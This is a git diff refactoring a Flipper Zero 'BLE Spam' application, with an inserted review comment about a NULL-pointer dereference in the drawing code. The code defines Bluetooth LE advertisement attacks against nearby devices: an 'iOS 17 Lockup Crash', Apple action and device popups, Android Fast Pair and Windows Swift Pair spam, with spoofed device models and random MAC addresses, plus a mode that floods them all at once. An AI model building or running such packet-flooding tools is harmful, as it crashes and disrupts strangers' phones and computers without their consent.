diff --git a/applications/external/ble_spam/ble_spam.c b/applications/external/ble_spam/ble_spam.c index e0af2bfdd..ce6aabe28 100644 --- a/applications/external/ble_spam/ble_spam.c +++ b/applications/external/ble_spam/ble_spam.c @@ -11,37 +11,32 @@ // Research on behaviors and parameters by @Willy-JL, @ECTO-1A and @Spooks4576 // Controversy explained at https://willyjl.dev/blog/the-controversy-behind-apple-ble-spam -typedef struct { - bool random_mac; - const BleSpamProtocol* protocol; - BleSpamMsg msg; -} Payload; - typedef struct { const char* title; const char* text; - Payload payload; + const BleSpamProtocol* protocol; + BleSpamPayload payload; } Attack; static Attack attacks[] = { { .title = "+ Kitchen Sink", .text = "Flood all attacks at once", + .protocol = NULL, .payload = { .random_mac = true, - .protocol = NULL, - .msg = {}, + .cfg = {}, }, }, { .title = "iOS 17 Lockup Crash", .text = "Newer iPhones, long range", + .protocol = &ble_spam_protocol_continuity, .payload = { .random_mac = false, - .protocol = &ble_spam_protocol_continuity, - .msg = + .cfg = { .continuity = { @@ -54,11 +49,11 @@ static Attack attacks[] = { { .title = "Apple Action Modal", .text = "Lock cooldown, long range", + .protocol = &ble_spam_protocol_continuity, .payload = { .random_mac = false, - .protocol = &ble_spam_protocol_continuity, - .msg = + .cfg = { .continuity = { @@ -71,11 +66,11 @@ static Attack attacks[] = { { .title = "Apple Device Popup", .text = "No cooldown, close range", + .protocol = &ble_spam_protocol_continuity, .payload = { .random_mac = false, - .protocol = &ble_spam_protocol_continuity, - .msg = + .cfg = { .continuity = { @@ -88,11 +83,11 @@ static Attack attacks[] = { { .title = "Android Device Pair", .text = "Reboot cooldown, long range", + .protocol = &ble_spam_protocol_fastpair, .payload = { .random_mac = true, - .protocol = &ble_spam_protocol_fastpair, - .msg = + .cfg = { .fastpair = {}, }, 
@@ -101,11 +96,11 @@ static Attack attacks[] = { { .title = "Windows Device Found", .text = "Requires enabling SwiftPair", + .protocol = &ble_spam_protocol_swiftpair, .payload = { .random_mac = true, - .protocol = &ble_spam_protocol_swiftpair, - .msg = + .cfg = { .swiftpair = {}, }, @@ -131,12 +126,13 @@ static int32_t adv_thread(void* ctx) { uint16_t delay; uint8_t* packet; uint8_t mac[GAP_MAC_ADDR_SIZE]; - Payload* payload = &attacks[state->index].payload; + BleSpamPayload* payload = &attacks[state->index].payload; + const BleSpamProtocol* protocol = attacks[state->index].protocol; if(!payload->random_mac) furi_hal_random_fill_buf(mac, sizeof(mac)); while(state->advertising) { - if(payload->protocol) { - payload->protocol->make_packet(&size, &packet, &payload->msg); + if(protocol) { + protocol->make_packet(&size, &packet, &payload->cfg); } else { ble_spam_protocols[rand() % ble_spam_protocols_count]->make_packet( &size, &packet, NULL); @@ -200,8 +196,8 @@ static void draw_callback(Canvas* canvas, void* ctx) { const Attack* attack = (state->index >= 0 && state->index <= ATTACK_COUNT - 1) ? &attacks[state->index] : NULL; - const Payload* payload = &attack->payload; - const BleSpamProtocol* protocol = (attack && payload->protocol) ? payload->protocol : NULL; + const BleSpamPayload* payload = &attack->payload; + const BleSpamProtocol* protocol = attack->protocol; canvas_set_font(canvas, FontSecondary); canvas_draw_icon(canvas, 4, 3, protocol ? protocol->icon : &I_ble); @@ -290,7 +286,7 @@ static void draw_callback(Canvas* canvas, void* ctx) { "%02i/%02i: %s", state->index + 1, ATTACK_COUNT, - protocol ? protocol->get_name(&payload->msg) : "Everything"); + protocol ? protocol->get_name(&payload->cfg) : "Everything"); canvas_draw_str(canvas, 4 - (state->index < 19 ? 1 : 0), 21, str); canvas_set_font(canvas, FontPrimary); diff --git a/applications/external/ble_spam/protocols/_base.h b/applications/external/ble_spam/protocols/_base.h index d3fbe98ff..fb59ee5b5 100644 
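Review bot: In the draw_callback hunk, `const BleSpamProtocol* protocol = attack->protocol;` dereferences `attack` even though the preceding ternary sets it to NULL when `state->index` is outside 0..ATTACK_COUNT-1; the removed line guarded this case with `attack && ...`. Keep the guard: `const BleSpamProtocol* protocol = attack ? attack->protocol : NULL;`, and form `payload` the same way, `const BleSpamPayload* payload = attack ? &attack->payload : NULL;`. The visible later use, `protocol->get_name(&payload->cfg)`, is already gated on `protocol`, but draw_callback continues outside the hunk, so any other use of `payload` needs the same check. adv_thread, in the hunk just above, indexes `attacks[state->index]` with no range check; that is safe only if advertising cannot start on an out-of-range index, which these hunks do not show.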
--- a/applications/external/ble_spam/protocols/_base.h +++ b/applications/external/ble_spam/protocols/_base.h @@ -8,10 +8,10 @@ #include #include -typedef union BleSpamMsg BleSpamMsg; +typedef union BleSpamProtocolCfg BleSpamProtocolCfg; typedef struct { const Icon* icon; - const char* (*get_name)(const BleSpamMsg* _msg); - void (*make_packet)(uint8_t* out_size, uint8_t** out_packet, const BleSpamMsg* _msg); + const char* (*get_name)(const BleSpamProtocolCfg* _cfg); + void (*make_packet)(uint8_t* _size, uint8_t** _packet, const BleSpamProtocolCfg* _cfg); } BleSpamProtocol; diff --git a/applications/external/ble_spam/protocols/_registry.h b/applications/external/ble_spam/protocols/_registry.h index 69070c356..cca571a5b 100644 --- a/applications/external/ble_spam/protocols/_registry.h +++ b/applications/external/ble_spam/protocols/_registry.h @@ -4,12 +4,17 @@ #include "fastpair.h" #include "swiftpair.h" -union BleSpamMsg { - ContinuityMsg continuity; - FastpairMsg fastpair; - SwiftpairMsg swiftpair; +union BleSpamProtocolCfg { + ContinuityCfg continuity; + FastpairCfg fastpair; + SwiftpairCfg swiftpair; }; extern const BleSpamProtocol* ble_spam_protocols[]; extern const size_t ble_spam_protocols_count; + +typedef struct { + bool random_mac; + BleSpamProtocolCfg cfg; +} BleSpamPayload; diff --git a/applications/external/ble_spam/protocols/continuity.c b/applications/external/ble_spam/protocols/continuity.c index ac0a2aa00..b52f45a5f 100644 --- a/applications/external/ble_spam/protocols/continuity.c +++ b/applications/external/ble_spam/protocols/continuity.c 
@@ -16,9 +16,9 @@ static const char* type_names[ContinuityTypeCount] = { [ContinuityTypeNearbyInfo] = "Nearby Info", [ContinuityTypeCustomCrash] = "Custom Packet", }; -const char* continuity_get_name(const BleSpamMsg* _msg) { - const ContinuityMsg* msg = &_msg->continuity; - return type_names[msg->type]; +const char* continuity_get_name(const BleSpamProtocolCfg* _cfg) { + const ContinuityCfg* cfg = &_cfg->continuity; + return type_names[cfg->type]; } #define HEADER_LEN (6) // 1 Size + 1 AD Type + 2 Company ID + 1 Continuity Type + 1 Continuity Size @@ -33,12 +33,12 @@ static uint8_t packet_sizes[ContinuityTypeCount] = { [ContinuityTypeCustomCrash] = HEADER_LEN + 11, }; -void continuity_make_packet(uint8_t* out_size, uint8_t** out_packet, const BleSpamMsg* _msg) { - const ContinuityMsg* msg = _msg ? &_msg->continuity : NULL; +void continuity_make_packet(uint8_t* _size, uint8_t** _packet, const BleSpamProtocolCfg* _cfg) { + const ContinuityCfg* cfg = _cfg ? &_cfg->continuity : NULL; ContinuityType type; - if(msg) { - type = msg->type; + if(cfg) { + type = cfg->type; } else { const ContinuityType types[] = { ContinuityTypeProximityPair, @@ -85,8 +85,8 @@ void continuity_make_packet(uint8_t* out_size, uint8_t** out_packet, const BleSp case ContinuityTypeProximityPair: { uint16_t model; - if(msg && msg->data.proximity_pair.model != 0x0000) { - model = msg->data.proximity_pair.model; + if(cfg && cfg->data.proximity_pair.model != 0x0000) { + model = cfg->data.proximity_pair.model; } else { const uint16_t models[] = { 0x0E20, // AirPods Pro @@ -113,8 +113,8 @@ void continuity_make_packet(uint8_t* out_size, uint8_t** out_packet, const BleSp } uint8_t prefix; - if(msg && msg->data.proximity_pair.prefix == 0x00) { - prefix = msg->data.proximity_pair.prefix; + if(cfg && cfg->data.proximity_pair.prefix == 0x00) { + prefix = cfg->data.proximity_pair.prefix; } else { if(model == 0x0055 || model == 0x0030) prefix = 0x05; 
@@ -176,8 +176,8 @@ void continuity_make_packet(uint8_t* out_size, uint8_t** out_packet, const BleSp case ContinuityTypeNearbyAction: { uint8_t action; - if(msg && msg->data.nearby_action.type != 0x00) { - action = msg->data.nearby_action.type; + if(cfg && cfg->data.nearby_action.type != 0x00) { + action = cfg->data.nearby_action.type; } else { const uint8_t actions[] = { 0x13, // AppleTV AutoFill @@ -197,8 +197,8 @@ void continuity_make_packet(uint8_t* out_size, uint8_t** out_packet, const BleSp } uint8_t flag; - if(msg && msg->data.nearby_action.flags != 0x00) { - flag = msg->data.nearby_action.flags; + if(cfg && cfg->data.nearby_action.flags != 0x00) { + flag = cfg->data.nearby_action.flags; } else { flag = 0xC0; if(action == 0x20 && rand() % 2) flag--; // More spam for 'Join This AppleTV?' @@ -265,8 +265,8 @@ void continuity_make_packet(uint8_t* out_size, uint8_t** out_packet, const BleSp break; } - *out_size = size; - *out_packet = packet; + *_size = size; + *_packet = packet; } const BleSpamProtocol ble_spam_protocol_continuity = { diff --git a/applications/external/ble_spam/protocols/continuity.h b/applications/external/ble_spam/protocols/continuity.h index 7e97f8425..e40d3525e 100644 --- a/applications/external/ble_spam/protocols/continuity.h +++ b/applications/external/ble_spam/protocols/continuity.h @@ -31,6 +31,6 @@ typedef struct { uint8_t type; } nearby_action; } data; -} ContinuityMsg; +} ContinuityCfg; extern const BleSpamProtocol ble_spam_protocol_continuity; diff --git a/applications/external/ble_spam/protocols/fastpair.c b/applications/external/ble_spam/protocols/fastpair.c index 8f329492e..1c06f68e6 100644 --- a/applications/external/ble_spam/protocols/fastpair.c +++ b/applications/external/ble_spam/protocols/fastpair.c 
@@ -4,18 +4,18 @@ // Hacked together by @Willy-JL and @Spooks4576 // Documentation at https://developers.google.com/nearby/fast-pair/specifications/introduction -const char* fastpair_get_name(const BleSpamMsg* _msg) { - const FastpairMsg* msg = &_msg->fastpair; - UNUSED(msg); +const char* fastpair_get_name(const BleSpamProtocolCfg* _cfg) { + const FastpairCfg* cfg = &_cfg->fastpair; + UNUSED(cfg); return "FastPair"; } -void fastpair_make_packet(uint8_t* out_size, uint8_t** out_packet, const BleSpamMsg* _msg) { - const FastpairMsg* msg = _msg ? &_msg->fastpair : NULL; +void fastpair_make_packet(uint8_t* _size, uint8_t** _packet, const BleSpamProtocolCfg* _cfg) { + const FastpairCfg* cfg = _cfg ? &_cfg->fastpair : NULL; uint32_t model_id; - if(msg && msg->model_id != 0x000000) { - model_id = msg->model_id; + if(cfg && cfg->model_id != 0x000000) { + model_id = cfg->model_id; } else { const uint32_t models[] = { // Genuine devices @@ -57,8 +57,8 @@ void fastpair_make_packet(uint8_t* out_size, uint8_t** out_packet, const BleSpam packet[i++] = 0x0A; // AD Type (Tx Power Level) packet[i++] = (rand() % 120) - 100; // -100 to +20 dBm - *out_size = size; - *out_packet = packet; + *_size = size; + *_packet = packet; } const BleSpamProtocol ble_spam_protocol_fastpair = { diff --git a/applications/external/ble_spam/protocols/fastpair.h b/applications/external/ble_spam/protocols/fastpair.h index 6555d0b6b..46162fbc5 100644 --- a/applications/external/ble_spam/protocols/fastpair.h +++ b/applications/external/ble_spam/protocols/fastpair.h @@ -6,6 +6,6 @@ typedef struct { uint32_t model_id; -} FastpairMsg; +} FastpairCfg; extern const BleSpamProtocol ble_spam_protocol_fastpair; diff --git a/applications/external/ble_spam/protocols/swiftpair.c b/applications/external/ble_spam/protocols/swiftpair.c index 26ea203e4..60d8808d4 100644 --- a/applications/external/ble_spam/protocols/swiftpair.c +++ b/applications/external/ble_spam/protocols/swiftpair.c 
@@ -4,18 +4,18 @@ // Hacked together by @Willy-JL and @Spooks4576 // Documentation at https://learn.microsoft.com/en-us/windows-hardware/design/component-guidelines/bluetooth-swift-pair -const char* swiftpair_get_name(const BleSpamMsg* _msg) { - const SwiftpairMsg* msg = &_msg->swiftpair; - UNUSED(msg); +const char* swiftpair_get_name(const BleSpamProtocolCfg* _cfg) { + const SwiftpairCfg* cfg = &_cfg->swiftpair; + UNUSED(cfg); return "SwiftPair"; } -void swiftpair_make_packet(uint8_t* out_size, uint8_t** out_packet, const BleSpamMsg* _msg) { - const SwiftpairMsg* msg = _msg ? &_msg->swiftpair : NULL; +void swiftpair_make_packet(uint8_t* _size, uint8_t** _packet, const BleSpamProtocolCfg* _cfg) { + const SwiftpairCfg* cfg = _cfg ? &_cfg->swiftpair : NULL; const char* display_name; - if(msg && msg->display_name[0] != '\0') { - display_name = msg->display_name; + if(cfg && cfg->display_name[0] != '\0') { + display_name = cfg->display_name; } else { const char* names[] = { "Assquach💦", @@ -43,8 +43,8 @@ void swiftpair_make_packet(uint8_t* out_size, uint8_t** out_packet, const BleSpa memcpy(&packet[i], display_name, display_name_len); // Display Name i += display_name_len; - *out_size = size; - *out_packet = packet; + *_size = size; + *_packet = packet; } const BleSpamProtocol ble_spam_protocol_swiftpair = { diff --git a/applications/external/ble_spam/protocols/swiftpair.h b/applications/external/ble_spam/protocols/swiftpair.h index 5ded8ebf8..c3ef21540 100644 --- a/applications/external/ble_spam/protocols/swiftpair.h +++ b/applications/external/ble_spam/protocols/swiftpair.h @@ -6,6 +6,6 @@ typedef struct { char display_name[25]; -} SwiftpairMsg; +} SwiftpairCfg; extern const BleSpamProtocol ble_spam_protocol_swiftpair;